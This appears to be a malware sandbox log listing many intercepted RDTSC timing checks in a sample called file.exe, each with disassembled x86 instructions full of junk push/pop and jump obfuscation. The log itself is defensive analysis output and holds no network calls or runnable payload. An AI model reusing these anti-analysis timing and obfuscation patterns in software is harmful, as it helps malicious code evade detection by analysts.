Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90235 second address: 4C90273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and dword ptr [eax], 00000000h 0x0000000e jmp 00007F12C08324D5h 0x00000013 and dword ptr [eax+04h], 00000000h 0x00000017 jmp 00007F12C08324CEh 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70491 second address: 4C704A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B7324h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C704A9 second address: 4C704AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C704AD second address: 4C704CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F12C15B7323h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C704CB second address: 4C704EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CD9 second address: 4C80CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CDD second address: 4C80CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CE1 second address: 4C80CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80CE7 second address: 4C80D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F12C08324D5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9001D second address: 4C90023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90023 second address: 4C90027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90027 second address: 4C9002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C9002B second address: 4C90051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F12C08324D4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C90051 second address: 4C900A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F12C15B7324h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F12C15B7320h 0x00000019 adc eax, 0E3E7E18h 0x0000001f jmp 00007F12C15B731Bh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB001C second address: 4CB00B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F12C08324CAh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F12C08324CBh 0x0000000f jmp 00007F12C08324D3h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007F12C08324D6h 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F12C08324CDh 0x0000002b add si, C576h 0x00000030 jmp 00007F12C08324D1h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F12C08324D0h 0x0000003c jmp 00007F12C08324D5h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB00B8 second address: 4CB00BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB00BE second address: 4CB00D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F12C08324CEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB00D9 second address: 4CB00E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB00E8 second address: 4CB00ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB00ED second address: 4CB0105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F12C15B731Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0105 second address: 4CB013F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e jmp 00007F12C08324D6h 0x00000013 test eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F12C08324CAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB013F second address: 4CB014E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB014E second address: 4CB0168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov edx, 10B20706h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F1332F35CD0h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0168 second address: 4CB016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB016C second address: 4CB0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0172 second address: 4CB01AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F12C15B731Eh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, 90h 0x00000018 jmp 00007F12C15B731Fh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB01AF second address: 4CB01B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB01B5 second address: 4CB0225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 1Fh 0x0000000b pushad 0x0000000c push edx 0x0000000d mov ch, EDh 0x0000000f pop edx 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 popad 0x00000015 ror eax, cl 0x00000017 pushad 0x00000018 pushad 0x00000019 mov ax, F375h 0x0000001d pushfd 0x0000001e jmp 00007F12C15B7322h 0x00000023 sub ah, FFFFFFC8h 0x00000026 jmp 00007F12C15B731Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov dl, ah 0x0000002f popad 0x00000030 leave 0x00000031 jmp 00007F12C15B731Bh 0x00000036 retn 0004h 0x00000039 nop 0x0000003a mov esi, eax 0x0000003c lea eax, dword ptr [ebp-08h] 0x0000003f xor esi, dword ptr [00F02014h] 0x00000045 push eax 0x00000046 push eax 0x00000047 push eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b push eax 0x0000004c call 00007F12C53A745Dh 0x00000051 push FFFFFFFEh 0x00000053 pushad 0x00000054 mov cl, A1h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F12C15B7327h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0225 second address: 4CB0252 instructions: 0x00000000 rdtsc 0x00000002 call 00007F12C08324D8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F12C08324CCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0252 second address: 4CB0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B731Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CB0264 second address: 4CB0268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6000F second address: 4C60015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60015 second address: 4C6004C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, 2D9Bh 0x00000011 mov cx, 0877h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F12C08324D8h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6004C second address: 4C60051 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60051 second address: 4C60078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F12C08324D7h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60078 second address: 4C6007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60122 second address: 4C60126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60126 second address: 4C6012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6012C second address: 4C60132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60132 second address: 4C60136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60136 second address: 4C601C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a call 00007F12C08324D6h 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007F12C08324D7h 0x00000018 sub si, A5FEh 0x0000001d jmp 00007F12C08324D9h 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [esp], ebx 0x00000027 pushad 0x00000028 mov cl, E3h 0x0000002a pushad 0x0000002b push edx 0x0000002c pop eax 0x0000002d mov ebx, 6BE51836h 0x00000032 popad 0x00000033 popad 0x00000034 mov ebx, dword ptr [ebp+10h] 0x00000037 jmp 00007F12C08324CDh 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F12C08324CDh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601C1 second address: 4C60262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F12C15B7327h 0x00000011 add cl, FFFFFFCEh 0x00000014 jmp 00007F12C15B7329h 0x00000019 popfd 0x0000001a jmp 00007F12C15B7320h 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 jmp 00007F12C15B7320h 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 jmp 00007F12C15B7320h 0x0000002e xchg eax, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push ebx 0x00000033 pop eax 0x00000034 jmp 00007F12C15B7329h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60262 second address: 4C60302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F12C08324CAh 0x00000012 xor eax, 4655A268h 0x00000018 jmp 00007F12C08324CBh 0x0000001d popfd 0x0000001e pop eax 0x0000001f mov esi, edi 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 jmp 00007F12C08324CBh 0x00000028 test esi, esi 0x0000002a jmp 00007F12C08324D6h 0x0000002f je 00007F1332F8081Ch 0x00000035 pushad 0x00000036 mov dh, ah 0x00000038 popad 0x00000039 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000040 jmp 00007F12C08324D5h 0x00000045 je 00007F1332F8080Ch 0x0000004b jmp 00007F12C08324CEh 0x00000050 mov edx, dword ptr [esi+44h] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60302 second address: 4C60306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60306 second address: 4C6030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6030A second address: 4C60310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60310 second address: 4C603B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d call 00007F12C08324CEh 0x00000012 call 00007F12C08324D2h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pushfd 0x0000001a jmp 00007F12C08324D0h 0x0000001f and eax, 41482978h 0x00000025 jmp 00007F12C08324CBh 0x0000002a popfd 0x0000002b popad 0x0000002c test edx, 61000000h 0x00000032 jmp 00007F12C08324D6h 0x00000037 jne 00007F1332F807C0h 0x0000003d jmp 00007F12C08324D0h 0x00000042 test byte ptr [esi+48h], 00000001h 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 movsx edi, ax 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C603B1 second address: 4C603B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5073E second address: 4C50742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50742 second address: 4C5075D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5075D second address: 4C50762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50762 second address: 4C50768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50768 second address: 4C507B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and esp, FFFFFFF8h 0x0000000a pushad 0x0000000b mov di, 1FA2h 0x0000000f pushad 0x00000010 mov dh, EFh 0x00000012 pushfd 0x00000013 jmp 00007F12C08324D2h 0x00000018 adc ah, 00000038h 0x0000001b jmp 00007F12C08324CBh 0x00000020 popfd 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F12C08324D5h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C507B6 second address: 4C50824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F12C15B7327h 0x00000009 jmp 00007F12C15B7323h 0x0000000e popfd 0x0000000f jmp 00007F12C15B7328h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F12C15B731Bh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F12C15B7325h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50824 second address: 4C5082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5082A second address: 4C5082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5082E second address: 4C508D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov si, BF01h 0x0000000e mov ax, 4A3Dh 0x00000012 popad 0x00000013 mov dword ptr [esp], esi 0x00000016 jmp 00007F12C08324D8h 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007F12C08324D0h 0x00000023 sub ebx, ebx 0x00000025 jmp 00007F12C08324D1h 0x0000002a test esi, esi 0x0000002c jmp 00007F12C08324CEh 0x00000031 je 00007F1332F87FC2h 0x00000037 jmp 00007F12C08324D0h 0x0000003c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushfd 0x00000047 jmp 00007F12C08324CCh 0x0000004c sub eax, 560CAF38h 0x00000052 jmp 00007F12C08324CBh 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C508D1 second address: 4C5096E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F12C15B7328h 0x00000008 sub ax, 2998h 0x0000000d jmp 00007F12C15B731Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, 7C6FD34Fh 0x0000001a popad 0x0000001b mov ecx, esi 0x0000001d jmp 00007F12C15B7322h 0x00000022 je 00007F1333D0CDA0h 0x00000028 jmp 00007F12C15B7320h 0x0000002d test byte ptr [77436968h], 00000002h 0x00000034 jmp 00007F12C15B7320h 0x00000039 jne 00007F1333D0CD86h 0x0000003f pushad 0x00000040 mov cl, 61h 0x00000042 popad 0x00000043 mov edx, dword ptr [ebp+0Ch] 0x00000046 jmp 00007F12C15B7324h 0x0000004b xchg eax, ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5096E second address: 4C50972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50972 second address: 4C50978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50978 second address: 4C509B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F12C08324CCh 0x00000013 and ecx, 006F5248h 0x00000019 jmp 00007F12C08324CBh 0x0000001e popfd 0x0000001f mov dx, ax 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C509B7 second address: 4C509F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7325h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F12C15B731Eh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F12C15B7327h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C509F9 second address: 4C509FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C509FF second address: 4C50A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60D90 second address: 4C60DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 32h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F12C08324CAh 0x0000000e push eax 0x0000000f jmp 00007F12C08324CBh 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F12C08324D6h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60DCE second address: 4C60DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60DD2 second address: 4C60DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60DD8 second address: 4C60DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C15B731Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60A86 second address: 4C60A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60A8A second address: 4C60AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B7329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AA7 second address: 4C60AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AC3 second address: 4C60AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AC7 second address: 4C60AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C08324D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AE1 second address: 4C60AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12C15B731Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AF7 second address: 4C60AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AFB second address: 4C60AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60AFF second address: 4C60B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
